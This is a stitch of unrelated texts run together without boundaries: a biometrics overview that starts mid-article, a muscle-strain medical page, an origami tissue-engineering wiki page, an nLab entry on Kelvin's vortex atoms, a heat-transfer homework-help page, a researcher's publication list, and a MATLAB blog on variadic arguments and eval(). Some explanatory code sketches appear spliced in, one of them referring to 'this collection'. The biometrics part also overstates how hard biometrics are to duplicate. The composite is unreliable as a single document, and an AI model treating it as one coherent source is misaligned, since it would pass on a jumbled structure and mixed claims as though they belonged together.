Vocal characteristics are used to identify pass-phrases spoken by a person. Telephones and microphones are cheap and easily available, and are used as the sound sensors involved in voice recognition. However, voice recognition can be easily affected by background noise. As technology continues to develop, voice recognition is becoming more reliable.

Fingerprint
Fingerprint biometrics is widely used by law enforcement agencies. The details of a digital fingerprint are extracted for fingerprint pattern analysis. There are currently three main applications for fingerprint recognition. The first one is used by law enforcement agencies and is known as the Automated Finger Imaging System (AFIS). The other two main applications are fraud prevention and access control for computers and other physical items.

Hand Geometry
Hand geometry involves measuring the dimensions of the hand: spatial geometry is captured after the person places their hand on a scanner. This method of biometrics has a low degree of distinctiveness, therefore it is not widely used for identification purposes.

Signature
Dynamic signatures are verified by measuring an individual's signature. This method of biometrics studies the speed, direction, pressure and the total time it took for the person to create the signature. This method can also determine where the stylus was raised from and lowered onto the writing surface.

Keystrokes
This method of biometrics examines a person's keystrokes on a keyboard. It can determine the speed, pressure, total time to type particular words and the time between hits on specific keys. This method is still in the development stage, with work under way to improve its robustness and distinctiveness.

How Biometrics Works

Your fingerprints, retina patterns and voice are all biological properties.
These unique human characteristics are used in conjunction with other forms of technology for identification and verification purposes. Most biometric systems measure and record the biometric characteristics of a person and match the results against a database that contains information about individual people. Biometric systems compare a person's characteristics either with a single stored record or with the records of many individuals; they therefore involve both one-to-one and one-to-many matches. Verification, also known as authentication, uses one-to-one matching, whereas identification uses one-to-many matching. There are two types of human characteristics used for biometric recognition, physical and behavioural. Fingerprints, hand geometry, facial and iris recognition are forms of physiological biometrics, which are measured to derive specific data to identify an individual. Voice verification, keystroke dynamics, signatures and an individual's actions are forms of behavioural characteristics, which are also measured to obtain information to directly or indirectly verify a person's identity.

Advantages and Disadvantages

Advantages
Biometric systems use the unique human characteristics of an individual. For this reason there is an extremely low probability of two humans sharing the same biometric data. Furthermore, biometric characteristics of a person are near impossible to duplicate and can only be altered or lost due to a serious accident. Biometrics has proven to be a secure method of ensuring data integrity; therefore, many banks, businesses and governments have incorporated biometrics into their security procedures.

Disadvantages
There are two types of recognition errors, False Accept Rate (FAR) and False Reject Rate (FRR). FAR is considered the more serious recognition error; it occurs when biometric data that does not match is accepted as a match by the system. FRR is when biometric data that does match is rejected by the system. This recognition error can be caused by incorrect alignment or dirt on the scanner. (A small numerical illustration of the FAR/FRR trade-off follows the list of current uses below.)

Current Uses

Governments, law enforcement, banks and various businesses are incorporating biometric identifiers to increase security:

• Law enforcement uses fingerprint tests for the identification of prisoners, and the USA has already started using iris recognition as well.
• Some Automatic Teller Machines (ATMs) have iris recognition in sensor cameras so people can access their bank accounts.
• Nationwide Building Society in Britain has replaced the use of PIN numbers in their bank machines with iris recognition.
• Standard Bank in South Africa used fingerprint verification on their ATMs.
• Heathrow airport added iris scanners as part of their security screening process.
• Laptops and cell phones have fingerprint recognition to prevent access by unknown users.
• plusID personal biometric devices work with physical and logical security systems for increased security.
• Pay-by-Touch allows a person to make purchases with their finger.
• The U.S. Department of Homeland Security has implemented US-VISIT to verify that the person entering the US is the same person who received a visa, by comparing the person's digital photograph and fingerprint with their database.
• Walt Disney World has installed fingerprint scanners to ensure one ticket is being used by the same person upon each entry.
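To make the FAR/FRR trade-off mentioned under Disadvantages concrete, the short Python sketch below draws match scores for genuine and impostor comparisons from made-up distributions and estimates both error rates at a chosen decision threshold. All of the numbers are hypothetical; a real system would obtain the scores from fingerprint, iris or other template comparisons.

import numpy as np

rng = np.random.default_rng(0)

genuine = rng.normal(0.80, 0.08, 10_000)    # scores when a person is compared with their own template
impostor = rng.normal(0.50, 0.10, 10_000)   # scores when different people are compared

threshold = 0.70                            # accept the identity claim if the score exceeds this value

far = float(np.mean(impostor >= threshold)) # impostors wrongly accepted (False Accept Rate)
frr = float(np.mean(genuine < threshold))   # genuine users wrongly rejected (False Reject Rate)
print(f"FAR = {far:.3%}, FRR = {frr:.3%}")

# Raising the threshold lowers FAR but raises FRR, and lowering it does the
# opposite, which is exactly the trade-off described above.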
See Also
• Iris Biometric System
• Iris Recognition
• Retina
• Facial Recognition
• Speech Recognition
• Fingerprint
• Hand Geometry
• Keystroke Dynamics
• Authentication

References
1. National Centre for State Courts (2002). "An Overview of Biometrics". Retrieved on March 23, 2007. [1]
2. Michigan State University (2007). "Biometric Research". Retrieved on March 23, 2007. [2]
3. University of Ottawa (January 2007). "Biometrics". Retrieved on March 23, 2007. [3]
4. Biometric Newsportal.com (2007). "Benefits of Biometrics". [4]
5. Woodward Jr., J.D., Horn, C., Gatune, J. & Thomas, A. (2003). Biometrics: A Look at Facial Recognition. Pittsburgh: RAND. [5]

External Links
• Biometrics: A Security Makeover
• Current Uses of Biometrics
• Biometric Security Barely Skin-Deep
• National Biometric Security Project
• Biometrics and Security
• Walt Disney World: The Government's Tomorrowland?

Last Revised: April 6, 2007
Muscle Strain (cont.)

What Specialists Treat Muscle Strains?

Muscle strains are commonly treated by primary-care providers, including family medicine doctors, internists, and general practitioners. Other doctors who can be involved in caring for patients with muscle strains include emergency physicians, physiatrists, orthopedists, sports-medicine doctors, and rheumatologists. Ancillary caregivers who can be involved in caring for muscle strain injuries include physical therapists, massage therapists, and chiropractors.

How Do Doctors Diagnose a Muscle Strain?

The doctor will take a medical history and perform a physical exam. The examination is generally all that is needed for diagnosis and can help to establish whether the muscle is partially or completely torn. A higher degree or grade of strain (grades 1-3) can involve longer healing, possible surgery, and a more complicated recovery. X-rays or laboratory tests are often not necessary, unless there was a history of trauma or evidence of infection. Infrequently, the physician may order a CT or MRI to better assess the diagnosis of the injury.

Medically Reviewed by a Doctor on 11/20/2017
Origami Tissue Engineering, by Adam Ramey

Overview
Many bodily tissues lack the ability to self-repair in the case of injury. Further, there are regularly far fewer tissues and organs available from donors than are needed by patients. This discrepancy highlights the need to develop cost-effective and viable tissue replacements. During early development, stem cells differentiate and commit to becoming different tissues and organs based on environmental stimuli. The fate of cells is controlled by concentration gradients, mechanical stimuli, and the relative position of cells to one another. Many strategies for making viable tissue replacements are based on mimicking the in vivo stimuli present during early development. Scientists can very easily grow cells on a two-dimensional plane, but are far less experienced at producing the non-homogeneous three-dimensional cultures similar to those produced by nature. As a result, researchers have pursued origami tissue engineering as a means of turning two-dimensional cell layers into complex three-dimensional structures. The central idea behind origami tissue engineering is that a complex three-dimensional structure can be formed by a series of simple folding operations, as in traditional origami. By studying folding patterns and means of producing folds, the tissue engineer gains a means of producing 3D structures from the 2D cultures they are so well versed at making. For example, stents that are used for clearing clogged blood vessels need to start out small (to fit through small passages and catheters) and end up large. Therefore, by knowing an optimal folding pattern, the size of the initial folded stent can be reduced significantly. There are many other similar applications that use efficient fold patterns for biological and medical purposes.

History
The art of origami began in Japan around the Edo period. Since then, people have been fascinated by the complex three-dimensional structures that can be made out of a two-dimensional sheet of paper. Artists began to make marvelous masterpieces, and their designs became more and more complex. For a short time in the mid-1900s, origami seemed to have reached its potential. This was until the involvement of mathematicians, who devised intricate models to explain the folding process and derive different folding patterns. With the use of these new algorithms and models, fold patterns could be optimized to create smaller shapes or shapes with far more detail. Scientists and engineers caught on quickly to the mathematically precise patterns and began using them for their structures and devices.
• 1603: Origami evolves as an art form in Japan
• 1900s: Origami artists begin to create more complex designs
• 1980s: Mathematicians start applying mathematical models to make even more intricate designs
• 1990: Robert Lang (Caltech) begins to study and apply these models to everyday applications
• 2003: Zhong You and Kaori Kuribayashi (Oxford Univ.) develop an origami stent
• 2005: Zhong You and Kaori Kuribayashi innovate their stent so that it is self-deployable

Applications

Stents
Traditional wire stent[B] TiNi foil stent[C]
Kaori Kuribayashi and Zhong You from the University of Oxford, UK have created stent grafts made out of a Ni-rich titanium/nickel foil that utilizes origami folding. Traditional wire stents often result in restenosis due to their porous/mesh nature[4]. Restenosis occurs when tissues grow through the pores of the mesh and create blockages[5]. Because the stent graft is made of TiNi foil with no holes, no tissue in-growth can occur. In addition, the stent grafts deploy as a result of a change in temperature. The transition temperature can be controlled by altering the amount of nickel used in the foil. Once the stent reaches the desired destination in the artery or vein, it is pushed out of the catheter, where it expands to its full size without the use of a traditional balloon. The automatic deployment works by two different mechanisms: one is triggered by heat (of the body, for example), while the other is triggered solely by the superelastic behavior of the material[1].

Material Qualities & Preparation
The different etched patterns on the top and bottom of the foil, created by negative photochemical etching.[D]
This Ni-rich Ti/Ni foil falls under a class of materials called shape-memory alloys (SMA), which means that the material always wants to return to the shape at which it was cold forged. Having the material be an SMA is ideal for origami engineering, since it will want to spring back to its original shape after being folded. Another useful property of this material is that it is biocompatible and will induce no negative immune response[6]. The reason such materials were not used before is that it was very challenging and expensive to make a TiNi foil (or another biocompatible SMA) so thin while retaining its properties. Now, due to research from the early 2000s, it is possible to create such a material relatively inexpensively[1]. To program the cylindrical shape memory, Kuribayashi and You aged the material at 773 K for 20-40 h[1]. Next, a folding pattern is devised and creases are applied to the foil using a negative photochemical etching process[1]. Following the rules of origami, different patterns were made on each side of the foil. Once the foil was etched, all that needed to be done to fold the stent was to subcool it using liquid nitrogen. Folding occurs because the foil contracts at cold temperatures, and the foil buckles at points where there is less stress; the points of less stress for these stents are the etched lines.

Results
In a simple experiment where a tube the diameter of a catheter was used to implant the stent into a second tube the diameter of an artery, the stent expanded quickly and effectively. In fact, the speed of the unfolding was so fast that a high-speed camera was needed to capture the motion. The tube that was meant to mimic the artery had to reach 319 K before the stent would deploy[1].
Unfortunately, this is above body temperature, but it may be altered by changing the relative amounts of nickel and titanium.
Unfolding stent. Images from a high-speed camera of the TiNi origami stent unfolding.[E]

Origami Alveoli
Origami alveoli are a model used to study the way alveoli work. The reason for using an origami model is that the shape of alveoli changes with time; this requires a model that can also change shape with time, which is known as a 4D model. First, a mathematical model was created that mimicked the motions of each moving part in the alveoli. Next, an origami model of the duct and the alveoli was built so that the impacts of different conditions could be seen visually.[7]
Alveoli. An origami model for an alveolus[F]

Cell Origami
Two different 3D structures created by CTF
Scientists from the University of Tokyo, Japan designed an experiment that created a self-folding, cell-laden micro-structure. They named this new method "Self-Folding Cell Origami". The premise was to use a force that cells exert naturally, the cell traction force (CTF), in order to make a controlled three-dimensional structure. In their experiments, the researchers coated glass plates with a gel that cells could not attach to. They then placed micro plates on the plate a short distance apart. Cells were then seeded on the micro plates. The cells bridged the gap and pulled against each other, creating a 3D structure. Further studies showed that the fold angle directly correlated with the number of cell attachments spanning the gap between micro plates. Researchers were able to create a box, a tube, and a dodecahedron structure by altering the micro plate pattern and by changing the number of cells seeded[2]. These preliminary results provide a strong basis for further research into producing 3D structures from 2D cell sheets.
Schematic of the whole process. Below is an image with the actin stained in green and the nucleus in blue.

DNA Origami
DNA origami refers to the self-assembly of hundreds of oligonucleotides into well-defined three-dimensional structures. Shawn Douglas has used this technique to create a nanorobot using DNA origami. A 35 nm x 35 nm x 45 nm barrel was produced by annealing a 7308-base-pair template strand with 196 oligonucleotide strands. The robot was designed using cadnano, a computer-aided design program specifically for DNA origami. The robot is capable of selectively interacting with cells by sensing antigens and releasing a payload as a result. The barrel is held shut by a DNA locking mechanism made of two semi-complementary DNA strands. When the antigen comes near this domain, the semi-complementary sequence releases from the sequence complementary to the antigen and the barrel springs open, delivering its payload. This DNA origami nanorobot has obvious applications for drug delivery and cell culture experiments.

References
1. K. Kuribayashi et al. Self-deployable origami stent grafts as a biomedical application of Ni-rich TiNi shape memory alloy foil. Materials Science and Engineering 2006, A 419, 131-137.
2. K. Kuribayashi-Shigetomi, H. Onoe and S. Takeuchi. Self-Folding Cell Origami: Batch Process of Self-Folding 3D Cell-Laden Microstructures Actuated by Cell Traction Force. MEMS 2012, 72.
3. Tae Soup Shim, Shin-Hyun Kim, Chul-Joon Heo, Hwan Chul Jeon, and Seung-Man Yang. Controlled Origami Folding of Hydrogel Bilayers with Sustained Reversibility for Robust Microcarrier. Angew. Chem. 2012, 124, 1449-1452.
4. E.R. Edelman, C. Rogers, Circulation 94 (1996) 1199–1202.
5. M.
Gottsauner-Wolf, D.J. Moliterno, A.M. Lincoff, E.J. Topol, Clin. Cardiol. 19 (1996) 347–356.
6. J. Ryhanen, Biocompatibility evaluation of nickel–titanium shape memory metal alloy, Dissertation, University Hospital of Oulu, Oulu, 1999.
7. H. Kitaoka et al. Origami Model for Breathing Alveoli, Advances in Experimental Medicine and Biology, 669, 2010, 49-52.

IMAGES
[A] <http://www.sciencemag.org.silk.library.umass.edu/content/332/6036/1376/F2.expansion.html>
[B] <http://news.injuryboard.com/johnson-amp-johnson-wins-patent-case-on-heart-stents.aspx?googleid=28948>
[C]–[E] K. Kuribayashi et al. Self-deployable origami stent grafts as a biomedical application of Ni-rich TiNi shape memory alloy foil. Materials Science and Engineering 2006, A 419, 131-137.
[F] H. Kitaoka et al. Origami Model for Breathing Alveoli, Advances in Experimental Medicine and Biology, 669, 2010, 49-52.
[G]–[H] K. Kuribayashi-Shigetomi, H. Onoe and S. Takeuchi. Self-Folding Cell Origami: Batch Process of Self-Folding 3D Cell-Laden Microstructures Actuated by Cell Traction Force. MEMS 2012, 72.
[I] Tae Soup Shim, Shin-Hyun Kim, Chul-Joon Heo, Hwan Chul Jeon, and Seung-Man Yang. Controlled Origami Folding of Hydrogel Bilayers with Sustained Reversibility for Robust Microcarrier. Angew. Chem. 2012, 124, 1449-1452.
nLab: On Vortex Atoms

The text
• Lord Kelvin, On Vortex Atoms, Proceedings of the Royal Society of Edinburgh, Vol. VI, pp. 94-105, 1867 (web)
presented the hypothesis that atoms (elementary particles) are fundamentally vortices in some spacetime-filling substance (the "aether").

Review and discussion:
Discussion in comparison to knotted states in superconductors:
• Filipp N. Rybakov, Julien Garaud, Egor Babaev, Kelvin knots in superconducting state, Phys. Rev. B 100, 094515 (2019) (arXiv:1807.02509)
Discussion in relation to skyrmions:
• Antonio Ranada, J. Trueba, Force Lines, Vortex Atoms, Topology, and Physics, Section I.A in: Topological Electromagnetism with hidden nonlinearity, in: Myron Evans (ed.), Modern Nonlinear Optics – Part 3, Wiley 2001 (doi:10.1002/0471231495.ch2)

Impact
As a literal theory of physics the vortex atom hypothesis lasted no more than 30 years, with even Thomson himself giving up on it by 1890 (Krage 02, p. 34), but it did make Peter Tait start thinking about the classification of knots, which eventually led to modern knot theory in mathematics. Moreover, faint shadows of Kelvin's original idea have been argued to be visible in string theory – and the failure of the vortex atom theory has been used to warn against placing too much hope in string theory.

Similarity with Descartes' thoughts
According to the Routledge Encyclopedia of Philosophy (here): Descartes also rejected atoms and the void, the two central doctrines of the atomists, an ancient school of philosophy whose revival by Gassendi and others constituted a major rival among contemporary mechanists. Because there can be no extension without an extended substance, namely body, there can be no space without body, Descartes argued. His world was a plenum, and all motion must ultimately be circular, since one body must give way to another in order for there to be a place for it to enter (Principles II: §§2–19, 33). Against atoms, he argued that extension is by its nature indefinitely divisible: no piece of matter is in its nature indivisible (Principles II: §20). Yet he agreed that, since bodies are simply matter, the apparent diversity between them must be explicable in terms of the size, shape and motion of the small parts that make them (Principles II: §§23, 64) (see Leibniz, G.W. §4).
However, according to (Krage 02, p. 33): In spite of the similarities, there are marked differences between the Victorian theory and Descartes's conception of matter. Thus, although Descartes's plenum was indefinitely divisible, his ethereal vortices nonetheless consisted of tiny particles in whirling motion. It was non-atomistic, yet particulate. Moreover, the French philosopher assumed three different species of matter, corresponding to emission, transmission, and reflection of light (luminous, "subtle", and material particles). The vortex theory, on the other hand, was strictly a unitary continuum theory.

Similarity to concepts of modern particle physics

Baryogenesis
It is however striking that the modern concept of baryogenesis via the chiral anomaly and its sensitivity to instantons is not too far away from Kelvin's intuition. To play this out in the most pronounced scenario, consider, for the sake of it, a Hartle-Hawking no-boundary spacetime carrying N Yang-Mills instantons.
Notice that an instanton is, in a precise sense, the modern higher-dimensional and gauge-theoretic version of what Kelvin knew as a fluid vortex. Then the non-conservation law for the baryon number current due to the chiral anomaly says precisely the following: the net baryon number in the early universe is a steadily increasing number – this is the modern mechanism of baryogenesis – such that as one approaches asymptotically late times after the "Big Bang" this number converges onto the integer N, the number of instantons. Hence while in the modern picture of baryogenesis via the gauge anomaly an elementary particle is not literally identified with an instanton, nevertheless each instanton induces precisely one net baryon. (If one doesn't want to consider a Hartle-Hawking-type Euclidean no-boundary spacetime but instead a globally hyperbolic spacetime, then the conclusion still holds, just not relative to vanishing baryon number at the "south pole" of the cosmic 4-sphere, but relative to the net baryon number at any chosen spatial reference slice.) For more on this see at baryogenesis – Exposition.

Skyrmions
Skyrmions realize baryons and atomic nuclei as "knotted states" (in fact as cohomotopy classes) of a meson field. According to Ranada-Trueba 01, p. 200: Skyrme had studied with attention Kelvin's ideas on vortex atoms.

category: reference
Last revised on May 20, 2021 at 10:05:51. See the history of this page for a list of all contributions to it.
Heat and Mass Transfer Assignment Help

This subject deals with the engineering behind the transfer of heat, or thermal energy. Heat transfer is achieved by conduction, convection or radiation, and each process follows a different law. Heat transfer can be affected by various factors such as temperature, pressure, material properties, the flow rate of the fluid, etc. The different modes of heat transfer are discussed below:

1. Conduction: This generally occurs in a solid body. In this mode, molecules transfer their energy to slower-moving molecules. It follows Fourier's law of heat conduction, which states that the rate of heat transfer through a material is proportional to the negative gradient of the temperature and to the area, perpendicular to the gradient, through which the heat flows. This gives a constant known as the thermal conductivity; every material has a different thermal conductivity.

2. Convection: This mode of heat transfer occurs in a fluid medium, i.e. a liquid or a gas. In this type of heat transfer, bulk movement of molecules occurs, which is why it does not occur in solids. It follows Newton's law of cooling, which states that the rate of heat loss of a body is directly proportional to the difference in temperature between the body and its surroundings. This gives a constant known as the heat transfer coefficient; it differs from material to material and also changes with the flow rate of the fluid.

3. Radiation: This mode of heat transfer does not require any medium. It is the mode by which the heat of the sun is transferred to the earth through the vacuum of space. It follows the Stefan-Boltzmann law, which states that the total energy transferred through radiation per unit surface area is directly proportional to the fourth power of the temperature of the body. This gives the Stefan-Boltzmann constant, which is equal to 5.670373 x 10^-8 W m^-2 K^-4.

There are various topics studied in this subject that deal with real-life applications. Some of them are mentioned below:
• Modes of heat transfer
• Steady and transient heat conduction
• Natural and forced convection
• Design of heat exchangers
• Boiling and condensation

Heat and mass transfer is widely used in the field of architecture to design energy-efficient infrastructure, and in climate engineering, as our climate is strongly affected by the radiation of the sun. Cooling of a space is also one of the most common examples of heat transfer in day-to-day life; evaporative cooling is a commonly used method to cool a space.
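To make the three rate laws above concrete, here is a minimal numerical sketch in MATLAB (the language used elsewhere in this collection). All material properties and dimensions below are illustrative assumptions, not data from any referenced source.

    % Conduction (Fourier's law): q = k * A * dT / L for a plane slab
    k  = 205;            % thermal conductivity of aluminium, W/(m*K) (approximate)
    A  = 0.01;           % area perpendicular to the heat flow, m^2
    dT = 80 - 20;        % temperature drop across the slab, K
    L  = 0.05;           % slab thickness, m (assumed)
    q_conduction = k * A * dT / L;        % W

    % Convection (Newton's law of cooling): q = h * A * (Ts - Tinf)
    h    = 25;           % heat transfer coefficient, W/(m^2*K) (assumed)
    Ts   = 80 + 273.15;  % surface temperature, K
    Tinf = 20 + 273.15;  % surrounding fluid temperature, K
    q_convection = h * A * (Ts - Tinf);   % W

    % Radiation (Stefan-Boltzmann law): q = eps * sigma * A * (Ts^4 - Tsur^4)
    sigma = 5.670373e-8; % Stefan-Boltzmann constant, W/(m^2*K^4)
    eps   = 0.9;         % surface emissivity (assumed)
    Tsur  = 20 + 273.15; % surrounding temperature, K
    q_radiation = eps * sigma * A * (Ts^4 - Tsur^4);  % W

    fprintf('Conduction: %.1f W, Convection: %.1f W, Radiation: %.1f W\n', ...
            q_conduction, q_convection, q_radiation);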
Seyed Mahed Mousavi 2023 pdf bib Understanding Emotion Valence is a Joint Deep Learning Task Gabriel Roccabruna | Seyed Mahed Mousavi | Giuseppe Riccardi Proceedings of the 13th Workshop on Computational Approaches to Subjectivity, Sentiment, & Social Media Analysis The valence analysis of speakers’ utterances or written posts helps to understand the activation and variations of the emotional state throughout the conversation. More recently, the concept of Emotion Carriers (EC) has been introduced to explain the emotion felt by the speaker and its manifestations. In this work, we investigate the natural inter-dependency of valence and ECs via a multi-task learning approach. We experiment with Pre-trained Language Models (PLM) for single-task, two-step, and joint settings for the valence and EC prediction tasks. We compare and evaluate the performance of generative (GPT-2) and discriminative (BERT) architectures in each setting. We observed that providing the ground truth label of one task improves the prediction performance of the models in the other task. We further observed that the discriminative model achieves the best trade-off of valence and EC prediction tasks in the joint prediction setting. As a result, we attain a single model that performs both tasks, thus, saving computation resources at training and inference times. pdf bib Response Generation in Longitudinal Dialogues: Which Knowledge Representation Helps? Seyed Mahed Mousavi | Simone Caldarella | Giuseppe Riccardi Proceedings of the 5th Workshop on NLP for Conversational AI (NLP4ConvAI 2023) Longitudinal Dialogues (LD) are the most challenging type of conversation for human-machine dialogue systems. LDs include the recollections of events, personal thoughts, and emotions specific to each individual in a sparse sequence of dialogue sessions. Dialogue systems designed for LDs should uniquely interact with the users over multiple sessions and long periods of time (e.g. weeks), and engage them in personal dialogues to elaborate on their feelings, thoughts, and real-life events. In this paper, we study the task of response generation in LDs. We evaluate whether general-purpose Pre-trained Language Models (PLM) are appropriate for this purpose. We fine-tune two PLMs, GePpeTto (GPT-2) and iT5, using a dataset of LDs. We experiment with different representations of the personal knowledge extracted from LDs for grounded response generation, including the graph representation of the mentioned events and participants. We evaluate the performance of the models via automatic metrics and the contribution of the knowledge via the Integrated Gradients technique. We categorize the natural language generation errors via human evaluations of contextualization, appropriateness and engagement of the user. pdf bib What’s New? Identifying the Unfolding of New Events in a Narrative Seyed Mahed Mousavi | Shohei Tanaka | Gabriel Roccabruna | Koichiro Yoshino | Satoshi Nakamura | Giuseppe Riccardi Proceedings of the The 5th Workshop on Narrative Understanding Narratives include a rich source of events unfolding over time and context. Automatic understanding of these events provides a summarised comprehension of the narrative for further computation (such as reasoning). In this paper, we study the Information Status (IS) of the events and propose a novel challenging task: the automatic identification of new events in a narrative. We define an event as a triplet of subject, predicate, and object. 
The event is categorized as new with respect to the discourse context and whether it can be inferred through commonsense reasoning. We annotated a publicly available corpus of narratives with the new events at sentence level using human annotators. We present the annotation protocol and study the quality of the annotation and the difficulty of the task. We publish the annotated dataset, annotation materials, and machine learning baseline models for the task of new event extraction for narrative understanding. 2022 pdf bib Evaluation of Response Generation Models: Shouldn’t It Be Shareable and Replicable? Seyed Mahed Mousavi | Gabriel Roccabruna | Michela Lorandi | Simone Caldarella | Giuseppe Riccardi Proceedings of the 2nd Workshop on Natural Language Generation, Evaluation, and Metrics (GEM) Human Evaluation (HE) of automatically generated responses is necessary for the advancement of human-machine dialogue research. Current automatic evaluation measures are poor surrogates, at best. There are no agreed-upon HE protocols and it is difficult to develop them. As a result, researchers either perform non-replicable, non-transparent and inconsistent procedures or, worse, limit themselves to automated metrics. We propose to standardize the human evaluation of response generation models by publicly sharing a detailed protocol. The proposal includes the task design, annotators recruitment, task execution, and annotation reporting. Such protocol and process can be used as-is, as-a-whole, in-part, or modified and extended by the research community. We validate the protocol by evaluating two conversationally fine-tuned state-of-the-art models (GPT-2 and T5) for the complex task of personalized response generation. We invite the community to use this protocol - or its future community amended versions - as a transparent, replicable, and comparable approach to HE of generated responses. pdf bib Can Emotion Carriers Explain Automatic Sentiment Prediction? A Study on Personal Narratives Seyed Mahed Mousavi | Gabriel Roccabruna | Aniruddha Tammewar | Steve Azzolin | Giuseppe Riccardi Proceedings of the 12th Workshop on Computational Approaches to Subjectivity, Sentiment & Social Media Analysis Deep Neural Networks (DNN) models have achieved acceptable performance in sentiment prediction of written text. However, the output of these machine learning (ML) models cannot be natively interpreted. In this paper, we study how the sentiment polarity predictions by DNNs can be explained and compare them to humans’ explanations. We crowdsource a corpus of Personal Narratives and ask human judges to annotate them with polarity and select the corresponding token chunks - the Emotion Carriers (EC) - that convey narrators’ emotions in the text. The interpretations of ML neural models are carried out through Integrated Gradients method and we compare them with human annotators’ interpretations. The results of our comparative analysis indicate that while the ML model mostly focuses on the explicit appearance of emotions-laden words (e.g. happy, frustrated), the human annotator predominantly focuses the attention on the manifestation of emotions through ECs that denote events, persons, and objects which activate narrator’s emotional state. 2021 pdf bib Would you like to tell me more? 
Generating a corpus of psychotherapy dialogues Seyed Mahed Mousavi | Alessandra Cervone | Morena Danieli | Giuseppe Riccardi Proceedings of the Second Workshop on Natural Language Processing for Medical Conversations The acquisition of a dialogue corpus is a key step in the process of training a dialogue model. In this context, corpora acquisitions have been designed either for open-domain information retrieval or slot-filling (e.g. restaurant booking) tasks. However, there has been scarce research in the problem of collecting personal conversations with users over a long period of time. In this paper we focus on the types of dialogues that are required for mental health applications. One of these types is the follow-up dialogue that a psychotherapist would initiate in reviewing the progress of a Cognitive Behavioral Therapy (CBT) intervention. The elicitation of the dialogues is achieved through textual stimuli presented to dialogue writers. We propose an automatic algorithm that generates textual stimuli from personal narratives collected during psychotherapy interventions. The automatically generated stimuli are presented as a seed to dialogue writers following principled guidelines. We analyze the linguistic quality of the collected corpus and compare the performances of psychotherapists and non-expert dialogue writers. Moreover, we report the human evaluation of a corpus-based response-selection model.
MATLAB Techniques: variadic (variable input and output) arguments

I've seen a lot of ugly implementations from people trying to deal with a variable number of input and output arguments. The most horrendous one I've seen so far came from MIT Physionet's WFDB MATLAB Toolbox. Here's a snippet showing how wfdbdesc.m handles variable input and output arguments:

function varargout=wfdbdesc(varargin)
% [siginfo,Fs,sigClass]=wfdbdesc(recordName)
...
%Set default pararamter values
inputs={'recordName'};
outputs={'siginfo','Fs','sigClass'};
for n=1:nargin
    if(~isempty(varargin{n}))
        eval([inputs{n} '=varargin{n};'])
    end
end
...
if(nargout>2)
    %Get signal class
    sigClass=getSignalClass(siginfo,config);
end
for n=1:nargout
    eval(['varargout{n}=' outputs{n} ';'])
end

The code itself reeks of a very 'smart' beginner who didn't RTFM. The code is so smart (shows some serious thought):
• Knows to use nargout to control varargout to avoid side effects when no output is requested.
• [Cargo cult practice]: (unnecessarily) tracks variable names.
• [Cargo cult practice]: uses varargin so it can be symmetric to varargout (also handled similarly). varargout might have the benefit mentioned above, but there is absolutely no benefit to using varargin over direct variable names when you are not forwarding or using inputParser().
• [Cargo cult practice]: tries to be efficient by skipping the processing of empty inputs. Judiciously non-symmetric this time (not done to the output variables)!
Yet the code is so dumb (hell of unwise, absolutely no good reason for almost every 'thoughtful' act put in) at the same time. Definitely MIT: Make it Tough!

This code pattern is wrong on so many levels:
• Unnecessarily obscuring the names by using varargin/varargout
• Managing a list of variable names manually
• Looping through each item of the varargin and varargout cells unnecessarily
• Using eval() just to do simple cell assignments! Makes me cringe!
Actually, eval() is not even needed to achieve all the remaining evils above. One could have used S_in = cell2struct(varargin) and varargout = struct2cell(S_out) instead, if one really wants to control the list of variable names manually!

The hurtful sins above came from not knowing a few common cell packing/unpacking idioms for dealing with varargin and varargout, which are cells by definition. Here are the few common use cases:

1. Passing variable arguments to another function (called perfect forwarding in C++): remember C{:} unpacks to comma-separated lists!

function caller(varargin)
    callee(varargin{:});

2. Limiting the number of outputs to what is actually requested: remember [C{:}] on the left-hand side (assignment) means the outputs are distributed as components of C that would have been unpacked as comma-separated lists, i.e. [C{:}] = f(); means [C{1}, C{2}, C{3}, ...] = f();

function varargout = f()
    % This will output no arguments when not requested,
    % avoiding echoing in the command prompt when the call is not terminated by a semicolon
    [varargout{1:nargout}] = eig(rand(3));

3. You can directly modify varargin and varargout as cells without de-referencing them with braces!

function varargout = f(varargin)
    % This one is effectively deal()
    varargout = varargin(1:nargout);
end

function varargout = f(C)
    % This one unpacks each cell's content to each output argument
    varargout = C(1:nargout);
end

One good example combining all of the above is to achieve the no-output-argument behaviour of example #2 yet neatly return the variables in the workspace directly by name.
function [a, b] = f()
    % Original way to code: will return a = 4 when "f()" is called without a semicolon
    a = 4;
    b = 2;
end

function varargout = f()
    % New way: will not return anything even when "f()" is called without a semicolon
    a = 4;
    b = 2;
    varargout = manage_return_arguments(nargout, a, b);
end

function C = manage_return_arguments(nargs, varargin)
    C = varargin(1:nargs);
end

I could have skipped nargs in manage_return_arguments() and used evalin(), but that would make the code nastily non-transparent. As a bonus, nargs can be fed min(nargout, 3) instead of nargout for extra flexibility.

With the technique above, wfdbdesc.m can be simply rewritten as:

function varargout = wfdbdesc(recordName)
% varargout: siginfo, Fs, sigClass
...
varargout = manage_return_arguments(nargout, siginfo, Fs, sigClass);

Unless you are forwarding variable arguments (with technique #1 mentioned above), input arguments can (and should) be named explicitly. Using varargin would not help you avoid padding the unused input arguments anyway, so there is absolutely no good reason to manage input variables with a flexible list. MATLAB already knows to skip unused arguments at the end as long as the code doesn't need them. Use exist('someVariable', 'var') instead.

MATLAB Practices: Code and variable transparency. eval() is one letter away from evil()

Transparency means that all references to variables must be visible in the text of the code.

The general wisdom about eval() is: do not use it! At least not until you are really out of reasonable options after consulting more than 3 experts on the newsgroups, forums and [email protected] (if your SMS is current)! Abusing eval() turns it into evil()!

The elves running inside MATLAB need to be able to track your variables to reason through your code because:
• it helps your code run much faster (eval() cannot be pre-compiled)
• it enables the Parallel Computing Toolbox (MATLAB has to know absolutely for sure about any shared writes)
• mlint can warn you about potential pitfalls through code smells
• it keeps you sane while debugging!
This is called 'transparency': MATLAB has to see what you are doing every step of the way. According to the Parallel Computing Toolbox documentation, "Transparency means that all references to variables must be visible in the text of the code", which I used as the subtitle of this post.

The 3 major built-in functions that break transparency are:
1. eval(), evalc(): arbitrary code execution resulting in read and write access to the caller's workspace.
2. assignin(): it poofs variables into its caller's workspace!
3. evalin(): it breaks open the stack and reads the variables in its caller's workspace!
They should be replaced by skillful use of dynamic field names, advanced uses of left assignment techniques, and freely passing variables as input arguments (remember MATLAB uses copy-on-write: nothing is copied if you just read it).

There are other frequently used native MATLAB functions that (under certain usages) break transparency:
1. load(): poofs variables from the file into the workspace. The best practice is to load the file as a struct, like S = load('file.mat');, which is fully transparent. Organizing variables into structs actually reduces mental clutter (namespace pollution)!
